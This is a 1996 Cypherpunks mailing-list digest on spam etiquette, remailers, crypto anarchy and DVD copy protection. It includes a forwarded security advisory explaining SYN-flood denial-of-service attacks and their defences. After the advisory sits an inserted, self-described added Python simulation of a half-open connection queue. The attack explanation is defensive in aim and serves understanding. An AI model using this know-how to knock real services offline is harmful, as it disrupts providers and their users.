From rjj at medialab.com Fri Sep 13 16:14:35 1996
From: rjj at medialab.com (Richard Johnson)
Date: Sat, 14 Sep 1996 07:14:35 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID:

At 19:02 9/12/96, Ross Wright wrote to cypherpunks at toad.com and remailer-operators at c2.org and...:
>On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:
>> However, since others may think like you, I guess I'll have to add a line
>> above my link stating that email not related to the purpose of my site
>> will be happily proof-read at the rate of $200 per hour,
>
>Just great. That sure takes away any anonymity you had about being
>"on the cutting edge" of the information age. That 1952 "proof-read"
>crap went out in the 70's. How can you hope to enforce it? It's a
>joke, right? :) Maybe not, since it's on your sig-line.

Hey, that was my too-long sig, Ross. There is obviously more than one person who disagrees with your assertion that listing an email address somewhere is an open invitation for mail to that address on any topic or for any purpose.

Also, I charge $500 per message. I've always liked flat fees. :-)

------- Forwarded Message -------
At 21:50 9/11/96, Ross Wright wrote to cypherpunks at toad.com and remailer-operators at c2.org:
>As I said having a website invites comments. It's like being a
>public figure. In effect you are publishing your e-mail address.

Interesting perspective. However, placing an email address on a web page is by no means an offer to take "comments" (i.e., marketing spams) on anything that strikes the spammer's fancy.

The context in which any email address is mentioned will tell you what sorts of messages are expected at that address. To maintain otherwise is just a flimsy excuse for "seedy low life multi-level-marketing jerks" who want to cover their postage-due unsolicited advertising/promotional email in some false cloak of respectability.
To continue the comment box analogy, the stuffing of salsa sample comment boxes (next to the salsa sample booth in the grocery store) with ads for anything you're pushing is most decidedly not what the comment box is for.

...

--
"As the most participatory form of mass speech yet developed, the Internet deserves the highest protection from governmental intrusion. ... Just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of the unfettered speech the First Amendment protects."
-- Judge Stewart Dalzell

Unsolicited advertising/promotional email proofread for $500/message! Your sending such a message to me is an explicit request for my services!

From gbroiles at netbox.com Fri Sep 13 16:16:25 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Sat, 14 Sep 1996 07:16:25 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <2.2.32.19960913185159.00733374@pop.ricochet.net>

At 09:23 AM 9/13/96 -0400, Brian Davis wrote:
>On Thu, 12 Sep 1996, jim bell wrote:
>
>> At 05:40 PM 9/12/96 -0700, Greg Broiles wrote:
>> ...
>> >Kozinski also suggested that computer-generated or morphed images of
>> >children involved in sexual acts may not be protected under the Constitution
>> >because of ongoing trauma to the child,
>>
>> Which child? Does he understand what "computer-generated" means?
>>
>
>Yes, he does, I think. But I think "protected" above should read
>"prohibited." [Note to Greg: could that be a typo?] The key kiddie
>porn/1st amendment case (whose name escapes
>me for the moment) offered two reasons why kiddie porn could be regulated
>in the face of the first amendment. One reason was the "on-going trauma to
>the child [victim]." In a morphed image, there is not (or at least may not be)
>an actual child victim. Thus the "continuing trauma" rationale for
>regulation does not exist in that case.

This is what the article says:

"Another freedom-of-speech-related concern may be that while computer-generated or 'morphed' Internet images of consenting adults in sexual acts may find constitutional protections, the same may not hold if such images use the likeness of a child because of ongoing trauma to the child, Kozinski says."

The only way this makes sense to me is that a child might be horrified to find their face pasted onto the body of a 20-year old involved in sexual activity. But this doesn't seem like a problem for criminal law to solve, it seems like a tort law problem, and I'm still inclined to think that the First amendment protects speech which upsets or horrifies someone.

The other rationale I see is the "child porn makes susceptible people go molest children" argument. (And the consequently molested child would then endure ongoing trauma.) The only difference I see between this argument and the argument (which has been rejected in U.S. courts, as far as I know) that adult porn makes susceptible people hurt women is the changing focus from "woman" to "child". But I don't see a big difference between ongoing trauma in adults and ongoing trauma in children, such that one merits special restrictions on otherwise protected speech and one does not.

But maybe that's why I'm studying for the bar and Alex Kozinski is on the 9th circuit. :)

--
Greg Broiles                | "We pretend to be their friends,
gbroiles at netbox.com       | but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |

From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 16:43:06 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Sat, 14 Sep 1996 07:43:06 +0800
Subject: "Remailers can't afford to be choosy"
Message-ID: <01I9FNB4810G9ULP6J@mbcl.rutgers.edu>

From: IN%"tcmay at got.net" 13-SEP-1996 04:33:21.66

>By the way, today's remailers appear to be primarily _experiments_ or
>_casual services_, not altruistic services for some nebulous idea of "free
>speech."
(Besides, if it's illegal for "spammers" to use remailers, so much
>for "free speech.")

Umm.... freedom of the press is freedom for he who owns the press. The remailer operators own the presses; why shouldn't they use whatever means they see fit to determine how they can be used? I encourage people not to discriminate on the basis of the political orientation of what's going through... but spam isn't political speech. (I agree that the government should not be in the business of determining what is spam and what is political speech - all speech should be protected - but remailer operators are not governments.)

-Allen

From admin at superhot.com Fri Sep 13 16:47:33 1996
From: admin at superhot.com (Admin)
Date: Sat, 14 Sep 1996 07:47:33 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609131941.NAA15578@rintintin.Colorado.EDU>

At 12:21 PM 9/13/96 -0600, you wrote:
>At 19:02 9/12/96, Ross Wright wrote to cypherpunks at toad.com and
>remailer-operators at c2.org and...:
>>On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:
>>> However, since others may think like you, I guess I'll have to add a line
>>> above my link stating that email not related to the purpose of my site
>>> will be happily proof-read at the rate of $200 per hour,
>>
>>Just great. That sure takes away any anonymity you had about being
>>"on the cutting edge" of the information age. That 1952 "proof-read"
>>crap went out in the 70's. How can you hope to enforce it? It's a
>>joke, right? :) Maybe not, since it's on your sig-line.
>
>
>Hey, that was my too-long sig, Ross. There is obviously more than one
>person who disagrees with your assertion that listing an email address
>somewhere is an open invitation for mail to that address on any topic or
>for any purpose.
>
>Also, I charge $500 per message. I've always liked flat fees.
:-)
>
>------- Forwarded Message -------
>At 21:50 9/11/96, Ross Wright wrote to
>cypherpunks at toad.com and remailer-operators at c2.org:
>>As I said having a website invites comments. It's like being a
>>public figure. In effect you are publishing your e-mail address.
>
>
>Interesting perspective. However, placing an email address on a web page
>is by no means an offer to take "comments" (i.e., marketing spams) on
>anything that strikes the spammer's fancy.

How would you know what the *intent* of these other people is in placing mailme: tags on their public pages unless you have been to the specific pages. You speak only for yourself, yet you try to imply that you speak for everyone on the www who has placed a mailto: tag on their pages.

>
>The context in which any email address is mentioned will tell you what
>sorts of messages are expected at that address.

Would it make a difference if the message to the webmasters mailto: buttons said "Nice webpages you have, when you get a moment check out my designs". Remember the thread is about an Artist who sent out only his URL to encourage visitors. This is and was a NON commercial site.

>To maintain otherwise is
>just a flimsy excuse for "seedy low life multi-level-marketing jerks" who
>want to cover their postage-due unsolicited advertising/promotional email
>in some false cloak of respectability.

*Respectability* is subjective to the definer...

>
>To continue the comment box analogy, the stuffing of salsa sample comment
>boxes (next to the salsa sample booth in the grocery store) with ads for
>anything you're pushing is most decidedly not what the comment box is for.

Without a disclaimer on the box stating specifically what cannot be placed in it there can be no knowing what the boxholder finds of personal interest...

>--
>"As the most participatory form of mass speech yet developed, the Internet
>deserves the highest protection from governmental intrusion. ...
Just as the
>strength of the Internet is chaos, so the strength of our liberty depends
>upon the chaos and cacophony of the unfettered speech the First Amendment
>protects."
> -- Judge Stewart Dalzell
>
>Unsolicited advertising/promotional email proofread for $500/message! Your
>sending such a message to me is an explicit request for my services!

Inane, off-thread, unsupported weak analogous attempts at reasoned argument received, but not read - simply deleted, for $1000/message. Sending OR posting the above to me or a Newsgroup that I may happen to read constitutes your accord and acceptance of the above contract. If I must read them, the fee is $2000/message.

admin

<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min         |Helping hardworking people   ||
||9.9¢ Anytime, Anywhere in US!  |like yourself pay the        ||
||Free sign-up, 6 second billing |lowest possible price for    ||
||http://www.superhot.com/phone  |high quality LD service.     ||
<>-----------------------1_303_692_5190------------------------<>

From mpd at netcom.com Fri Sep 13 16:54:09 1996
From: mpd at netcom.com (Mike Duvos)
Date: Sat, 14 Sep 1996 07:54:09 +0800
Subject: Internet Drivers' Licenses
In-Reply-To: <199609131832.OAA17532@attrh1.attrh.att.com>
Message-ID: <199609132026.NAA15888@netcom9.netcom.com>

Bill Stewart writes:
> Anybody for an Internet Driver's License?

At this point, I would love the ability to filter news and mail according to some criteria related to the sender's probable reputation.

Back in the early days of C&S, spam was an intellectual issue. Now it is a good chunk of the entire bandwidth of major components of the Net. I am now getting more junk email than email from people I care to correspond with. It seems one can't even read the scholarly newsgroups anymore without "Come Watch Us Lick Ourselves on the Web" messages popping up regularly.
It's really getting to the point where the time-honored suggestion of "just hit your delete key" cannot deal with the overwhelming amount of Drek posted, much of it with subject lines deliberately designed to blend in with the newsgroup topic.

Just being able to filter out posts from Net addresses that don't correspond to real identifiable humans posting under their legal names would be a good first step. Purely voluntary, of course, since any filtering would be done at the reading end, and people could still post anything they liked.

--
Mike Duvos       $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger.                   $

From tcmay at got.net Fri Sep 13 16:58:06 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 07:58:06 +0800
Subject: Unrequested mail from Mr. Babayco
Message-ID:

At 8:24 PM 9/13/96, Z.B. wrote:
>Even if you are serious about this, the fact that you signed up to a
>mailing list entitles you to all of the messages that go over this list,
>plus people's replies to your posts. The point of my original message
>was that mail from a non-commercial individual, such as yourself or other
>people on this list is welcomed, but mail from people trying to sell me
>something is not. Perhaps I should have made that more clear in my
>original post.

And by having a public mailbox, you are in no position to say some entities cannot mail to you.

While unwanted e-mail is bothersome, so are unwanted telephone calls, unwanted faxes, unwanted regular mail, unwanted conversations at parties, unwanted attention in general, and "unwanted unwanteds" in their most general form.

But unless such unwanted things become frequent beyond some threshold (as repeated phone calls may be, or as "fax-bombing" can be, or as "stalking" situations occur, depending on various laws), the law does not offer convenient solutions. Nor should we want the already overcrowded courts and jails clogged with "He sent me a message I didn't want!" whines.

The solution is screening calls with an answering machine or using something like Caller ID to screen incoming calls, having an unlisted number, turning off a fax machine except when expecting a fax, using Eudora or procmail to filter messages.

In other words, the equivalents of fences, locks, doors, gates, and other barriers.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Fri Sep 13 17:03:51 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 08:03:51 +0800
Subject: "Remailers can't afford to be choosy"
Message-ID:

At 7:03 PM 9/13/96, E. Allen Smith wrote:
>From: IN%"tcmay at got.net" 13-SEP-1996 04:33:21.66
>
>>By the way, today's remailers appear to be primarily _experiments_ or
>>_casual services_, not altruistic services for some nebulous idea of "free
>>speech." (Besides, if it's illegal for "spammers" to use remailers, so much
>>for "free speech.")
>
> Umm.... freedom of the press is freedom for he who owns the press.
>The remailer operators own the presses; why shouldn't they use whatever means
>they see fit to determine how they can be used? I encourage people not to
>discriminate on the basis of the political orientation of what's going
>through... but spam isn't political speech. (I agree that the government
>should not be in the business of determining what is spam and what is
>political speech - all speech should be protected - but remailer operators
>are not governments.)

There are many nuanced definitions of "free speech."
I was replying to someone who used it in connection with his belief that remailers primarily exist as a service to enable "free speech." Hence my comment.

I'm fully aware of the rights of remailers to limit what they pass on. I just don't think it wise, nor do I think it fits with pious calls for "free speech."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From jim at suite.suite.com Fri Sep 13 17:05:26 1996
From: jim at suite.suite.com (Jim Miller)
Date: Sat, 14 Sep 1996 08:05:26 +0800
Subject: really (?) undetectable crypto
Message-ID: <9609132008.AA08893@suite.com>

> What about Walter making insignificant changes to the
> cleartext and replacing the hash with the new hash?
> Because you are using an unkeyed hash (and not a sig) he can
> do that and foul up the stegomessage
>
> Walter can still play silly spooks with your stego if he breaks the
> 40-bit encryption.

True. The example was just illustrative. Given unkeyed hashes or 40 bit encryption, Walter could also frame you by replacing your bits with ones that combine into a very incriminating encrypted message and then leaking the key.

> The cyphertext/plaintext ratio looks like getting
> really huge too. Your messages must all arrive, and
> retain the right order.
>

Hey, I never claimed it was efficient. :-)

Actually, the messages don't have to arrive in order. The correct order can be discovered by trial and error (e.g. does this combination decrypt into something readable? No. How about this one?).
Depending on the cryptographic protocol, there may be other, more efficient means for sending hidden encrypted messages. If, for example, a protocol requires a cryptographically random confounder to be appended to the front of the plaintext before encryption, you could use chunks of you secret encrypted message for the entire confounder. Jim_Miller at suite.com From tcmay at got.net Fri Sep 13 17:11:53 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 08:11:53 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 5:06 PM 9/13/96, Asgaard wrote: >From a >pure egotistical viewpoint I really should join the present calls >for, as the debate goes here in Sweden, transforming the enemployed >into 'maids and servants'. But I don't. I think it would backlash; >the 'lower classes' would come back at us and cut our throats >eventually (say, when 70% are serving the remaining 30%). The 70% already _are_ cutting the throats of the other 30%. It's called a 60%+ tax rate. This is the sum of: federal income tax, state income tax, city tax, sales tax, gas tax, energy tax, property tax, entertainment tax, special excise taxes on alcohol, cigarettes, etc., and miscellaneous other taxes tacked on...not to mention the "double taxation" of certain forms of income--every dollar Intel earns is taxed first at 48% by the Feds and the State of California, then what's left is taxed at 35-40% when it reaches the owners of the company. (Oh, and buyers of PCs containing Intel chips pay 8.25% for the privilege of buying the PC.) The masses have realized, as De Tocqueville predicted 150 years ago, that they can use the democratic process to pick the pockets of others. This is why I have no faith in "democracy," and consider crypto anarchy to be the best way to undermine this flawed system. >With the present rate of increase in world population the planet >will go to hell anyway. But suppose the population problem could >be fixed. 
Then, with technology escalating towards singularity, Cf. what sociologists call "the demographic transition." Countries that value learning and wealth are _not_ facing a population problem. In fact, many such countries are now at "below replacement" birth levels. >machines doing almost all labor, there could certainly exist a >system where the 'dumb' and 'lazy' could be fed and housed properly >without anybody complaining. Those who want to become maids and >servants for some extra pocket money, well, good luck to them. One need not wait for this fanciful "singularity"--by any reasonable standards of providing minimal food and minimal shelter, the unemployed poor of today are receiving this. Ask a peasant of, say, 18th century Europe if he'd consider himself sheltered and fed if he could have an apartment in a building, a microwave oven, a television, a MacDonald's nearby, and enough extra spending money for some beer. I predict that "the masses fed by the nanotechnological singularity" will be just as likely to riot and burn down their own neighborhoods as the "masses fed by industrialization and distribution" are prone to do today. (The point being that people want more than "basic food and shelter," but are often unwilling to make the commitments and sacrifices in their lives to gain the wherewithal to earn significant salaries.) >But to force people into menial service jobs just to literally >survive is not to my taste. No, give them minimal shelter for >nothing and from there on let the market anarcho-capitalistic >struggle begin, for obtaining a higher than minimum material >standard or reputational standing. There is a basic error here, one that I see often. Who says that the "anarcho-capitalists" will freely give away, say, some vast fraction of their profits so as to subsidize the overall society? Any more so than the owners of flour mills and computer chip companies give away 99% of their profits. 
And crypto anarchy means it will not be clear who is making what, who is generating what income, and where it is located. And the producers of wealth will be able to move accounts, resources, and even factories around the world. If one jurisdiction socks them with exorbitant taxes (which may be anything more than a nearly ignorable 10% overall tax), they can move. Regulatory arbitrage strikes again. Ask your fellow Swedes about the drain of talent out of Sweden in the 60s and 70s...the flight of Bergmann, actors and actresses, corporations, and even ABBA. (Though I understand most of ABBA moved back to Sweden and is now chummy with the Queen.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From alano at teleport.com Fri Sep 13 17:17:55 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 14 Sep 1996 08:17:55 +0800 Subject: What is this nonsense? (Anti DVD piracy chip) Message-ID: <3.0b15.32.19960913112614.00b0da58@mail.teleport.com> At 02:16 PM 9/13/96 +0200, Gary Howland wrote: >Taken from a recent Edupage: > >> SGS-THOMSON TAKES AIM AT DVD PIRACY >> SGS-Thomson Microelectronics has developed a computer chip that prevents >> would-be DVD pirates from making unlawful copies of movies from digital >> video disc players. The chip scrambles the disk's coding if it's duplicated >> on a VCR. (Investor's Business Daily 11 Sep 96 A6) > >Anyone know anything about this? Sounds like nonsense to me ... Probably a variation on the Macrovision copy protection scheme.
Of course they do not care that such copy protection methods usually cause a loss in signal quality. (Which is why people buy laser discs in the first place.) Hopefully it will be something that never succeeds in the marketplace. (Although I expect it to be imposed whether the consumer wants it or not or how bad it screws up the signal.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From liberty at gate.net Fri Sep 13 17:20:22 1996 From: liberty at gate.net (Jim Ray) Date: Sat, 14 Sep 1996 08:20:22 +0800 Subject: did you go to school? Message-ID: <199609132109.RAA31614@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: robert at precipice.v-site.net, cypherpunks at toad.com, remailer-operators at c2.org Date: Fri Sep 13 17:07:32 1996 "Hipcrime" Detweilled: ... > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). > [This doesn't deserve comment, and I have already killfiled this asshole-liar-who-is-unable-to-admit-when-he's-wrong, but...] 1. Go run a remailer if you proclaim that you like them so much. 2. Private property that belongs to "mankind in general"? A new one on me. Webster's may help you understand English, but your debate skills are akin to your personality, and yes, once again, that was private email. JMR -- "who is beginning to get used to this from the net.jerk population.
Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From zachb at netcom.com Fri Sep 13 17:22:54 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 14 Sep 1996 08:22:54 +0800 Subject: Unrequested mail from Mr. Babayco In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: > At 4:28 AM 9/13/96, Z.B. wrote: > [snip] > > > Mr. Babayco, > > I did not request your mail to me, and I am annoyed at having received it. > > I am not interested in the views you are advertising or selling, and I'd > prefer that you not mail me. > > To make me whole, I demand that you send me $125 for this occurrence, and > $125 for each future occurrence. > > Have a nice day. > > --Timothy C. May Very well then, Mr. May. I did not request YOUR mail EITHER, so I demand that you send ME $250 for receipt of this message, and $250 for each additional message I receive from you. I also demand that you send me $10,000 for taking up my valuable time with this message, and $5,000 for network access fees. Have a nice day!
Even if you are serious about this, the fact that you signed up to a mailing list entitles you to all of the messages that go over this list, plus people's replies to your posts. The point of my original message was that mail from a non-commercial individual, such as yourself or other people on this list is welcomed, but mail from people trying to sell me something is not. Perhaps I should have made that more clear in my original post. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From markm at voicenet.com Fri Sep 13 17:28:05 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 14 Sep 1996 08:28:05 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 12 Sep 1996, Ross Wright wrote: > On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote: > > > > > > > These people have invited the email, and the associated expense, > > > by placing > > > a public email-to: button on their public www page. > > Correct! By sending me unsolicited mail, you have invited the associated expense of having every recipient bounce the message back to you (maybe sending a courtesy copy to your postmaster). If you don't want to wade through 20 megs of mail in one day, don't send unsolicited email. I hardly consider this abuse. If you have no ethical problem with sending people unsolicited junk to me, I have no problem sending it right back to you indicating that I don't appreciate the email. Sounds fair to me. - -- Mark PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From alano at teleport.com Fri Sep 13 17:37:37 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 14 Sep 1996 08:37:37 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <3.0b15.32.19960913111921.00b03180@mail.teleport.com> At 10:13 AM 9/13/96 -0400, pjb at ny.ubs.com wrote: >> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > >It could, of course, also be someone, from a set of several million, that >find Mr. Rosen to be such as odious prick that they did it just to drive him >out of their misery. Just thinking out loud.. Or it could be any of the readers of 2600 (which published an article on SYN floods in the last issue). --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises."
From mycroft at datasphere.net Fri Sep 13 17:41:51 1996 From: mycroft at datasphere.net (Mycroft) Date: Sat, 14 Sep 1996 08:41:51 +0800 Subject: Forwarded message from Christopher Klaus (SYN Flooding [info]) Message-ID: <199609132117.OAA05315@chrome.DataSphere.NeT> ------- start of forwarded message (RFC 934 encapsulation) ------- Message-ID: <199609131458.KAA06507 at phoenix.iss.net> Reply-To: Christopher Klaus From: Christopher Klaus Sender: Bugtraq List To: Multiple recipients of list BUGTRAQ Subject: SYN Flooding [info] Date: Fri, 13 Sep 1996 10:58:24 -0400 [Below we have a software tool that will recognize SYN floods and correct the problem.] Possible solution to SYN Flooding attacks The attack is on!
Both 2600 and Phrack, 2 of the biggest well-known underground hacking magazines, have posted exploit code to do one of the nastiest denial of service attacks that the Internet has seen so far. Hundreds of people have access to these programs to bring down services on the Internet. Many of these people are targeting their attacks at various organizations such as ISPs. Panix, an ISP, has been under attack for quite a few days now and they have not been able to receive email. Many other ISPs are suffering from the SYN flood attack. This attack is being discussed on many mailing lists, newsgroups, and Thursday's Wall Street Journal (9/12/96). Fortunately a solution already exists as we discuss below. Everyone connected to the Internet relies on TCP/IP. When you establish a connection with TCP, you do a 3-way handshake. The connecting host sends a SYN packet to the receiving host. The receiving host sends a SYN|ACK packet back and to fully establish a connection, the connecting host finally responds with an ACK packet. In a SYN flood attack, an attacker host sends many SYN packets and does not respond with an ACK to the SYN|ACK's. As the receiving host is waiting for more and more ACK's, the buffer queue will fill up and the receiving machine can no longer accept legitimate connections. This means that attackers can block your email, web, or any other service you are providing on the Internet. To even make this attack worse, the code exploiting the problem randomizes the source address of the attacking host. Thus, the receiving machine gets packets that appear to be from all over the Internet, hiding the location of the attacker. Solution There are several things we can do to stop these attacks from being effective. With the routers for most ISPs, they should be blocking any non-internal addresses from leaving their network and going to the Internet. This will stop an attacker if their ISP implements this.
Unfortunately, this does not stop an attack from areas on the Internet that do not block that. But at least the ISP can feel comfortable to know that an attacker can not launch his attack from that ISP. Here are two methods of helping eliminate the problem. Some of the exploit code I have seen does not pick a random source port. It would be easy to block the attack with a router denying any packets coming from a specific source port. This may not be too effective because of the trivial nature of adding code to randomize the source port, sequence number, source address, and TTL. But it might help you temporarily if you notice the attacks have any pattern that can be blocked by router rules. Another way to fix this is to set the kernel maximum number of half open connections allowed (SO_MAXCONN) to a higher number than the default value. We have a tool that will look for SYN packets that do not get followed with ACK and clean the half open connections by sending a RST packet. This unclogs the port and allows legitimate connections to happen. This tool is called RealSecure (tm). To obtain a copy of the RealSecure tool, send email to majordomo at Iss.net and within the body of the message, type: subscribe realsecure RealSecure (tm) is a comprehensive attack recognition and real time response tool that ISS is alpha testing and will expire in 60 days. - -- Christopher William Klaus Voice: (770)395-0150. Fax: (770)395-1972 Internet Security Systems, Inc. "Internet Scanner finds Ste. 660,41 Perimeter Center East,Atlanta,GA 30346 your network security holes Web: http://www.iss.net/ Email: cklaus at iss.net before the hackers do." 
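The half-open queue behaviour described in the forwarded advisory above, as an added example that is not part of the original message and is not RealSecure's code: a small model of one listening port that replays a constructed packet trace and records which unanswered SYNs a responder would reset. The backlog of 8, both timeout values, the class and function names and the trace itself (documentation-range addresses) are assumptions made for illustration.

```python
from collections import namedtuple

# One inbound packet as a sensor would log it. Timestamps are in milliseconds.
Pkt = namedtuple("Pkt", "ts src sport flags")


class HalfOpenTracker:
    """Model of one listening port's queue of half-open connections.

    backlog    -- how many half-open connections the listener can hold
    timeout_ms -- age at which an unanswered SYN|ACK is given up on; a
                  responder would send a RST for each such entry
    """

    def __init__(self, backlog, timeout_ms):
        self.backlog = backlog
        self.timeout_ms = timeout_ms
        self.pending = {}      # (src, sport) -> time the SYN arrived
        self.completed = []    # handshakes finished by the client's ACK
        self.refused = []      # SYNs that found the queue full
        self.reaped = []       # half-open entries timed out (RST candidates)
        self.peak = 0          # largest queue depth seen

    def _expire(self, now):
        # Drop every entry whose SYN|ACK has gone unanswered for too long.
        for key, seen in list(self.pending.items()):
            if now - seen >= self.timeout_ms:
                del self.pending[key]
                self.reaped.append(key)

    def feed(self, pkt):
        self._expire(pkt.ts)
        key = (pkt.src, pkt.sport)
        if pkt.flags == "S":
            if key in self.pending:          # retransmitted SYN, already queued
                return
            if len(self.pending) >= self.backlog:
                self.refused.append(key)     # queue full: connection is lost
                return
            self.pending[key] = pkt.ts       # server answers SYN|ACK and waits
            self.peak = max(self.peak, len(self.pending))
        elif pkt.flags == "A" and key in self.pending:
            del self.pending[key]            # third step of the handshake
            self.completed.append(key)
        elif pkt.flags == "R":
            self.pending.pop(key, None)      # client aborted the attempt


def build_trace():
    """Constructed sample: three real clients and 20 SYNs that are never ACKed."""
    clients = [("198.51.100.10", 40000, 0),
               ("198.51.100.11", 40001, 2050),
               ("198.51.100.12", 40002, 6050)]
    trace = []
    for src, sport, t in clients:
        trace.append(Pkt(t, src, sport, "S"))
        trace.append(Pkt(t + 100, src, sport, "A"))
    for i in range(20):                      # one unanswered SYN every 100 ms
        trace.append(Pkt(1000 + 100 * i, "203.0.113.%d" % (i + 1), 1024 + i, "S"))
    return sorted(trace, key=lambda p: p.ts)


def replay(backlog, timeout_ms):
    """Run the constructed trace through a tracker and return it for inspection."""
    tracker = HalfOpenTracker(backlog, timeout_ms)
    for pkt in build_trace():
        tracker.feed(pkt)
    return tracker


if __name__ == "__main__":
    # 75 s is an assumed long connection-establishment timer; 500 ms is an
    # assumed aggressive reaping interval.
    for label, timeout in (("75 s timer", 75000), ("500 ms reaper", 500)):
        t = replay(backlog=8, timeout_ms=timeout)
        print("%-14s completed=%d refused=%d reaped=%d still_half_open=%d peak=%d"
              % (label, len(t.completed), len(t.refused), len(t.reaped),
                 len(t.pending), t.peak))
```

A reaping interval this short would also reset a legitimate client whose ACK takes longer than the interval to arrive, so the value is a trade-off rather than a fix.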
------- end ------- -- [:]====================================================================[:] [\] Mycroft >>>>>[DataSphere]<<<<< [=] [=] Key fingerprint = DD B1 A7 D9 2D DF A0 F7 23 C2 6B EC 5A AD 01 A9 [\] [:]====================================================================[:] From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 17:48:34 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 14 Sep 1996 08:48:34 +0800 Subject: NANDO: Radikal Message-ID: <01I9FSS1YYRO9ULPJS@mbcl.rutgers.edu> I've sent (using wURLd Presence) the URLs of some of the mirror sites to several search engines. -Allen > _________________________________________________________________ > The Peanut Roaster > _________________________________________________________________ > GERMANS PROBE COMPUTER FIRMS OVER ELECTRONIC PAPER > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BONN (Sep 13, 1996 4:05 p.m. EDT) - Germany's Federal Prosecutor's > Office said on Friday it was investigating a number of so-called > Internet providers because they were giving computer subscribers > access to a radical left-wing electronic newspaper. > A spokesman for the office said the firms were suspected of inciting > criminal activity and advertising for a terrorist group because they > had failed to block access to the left-wing Internet page "radikal > 154." > Among other things, the electronic site provides instructions on how > to sabotage railway lines. Prosecutors consider it to be terrorist > propaganda. > On Friday, the page was still available via major Internet providers > CompuServe Inc, AOL and T-Online, the online service of > telecommunications giant Deutsche Telekom.
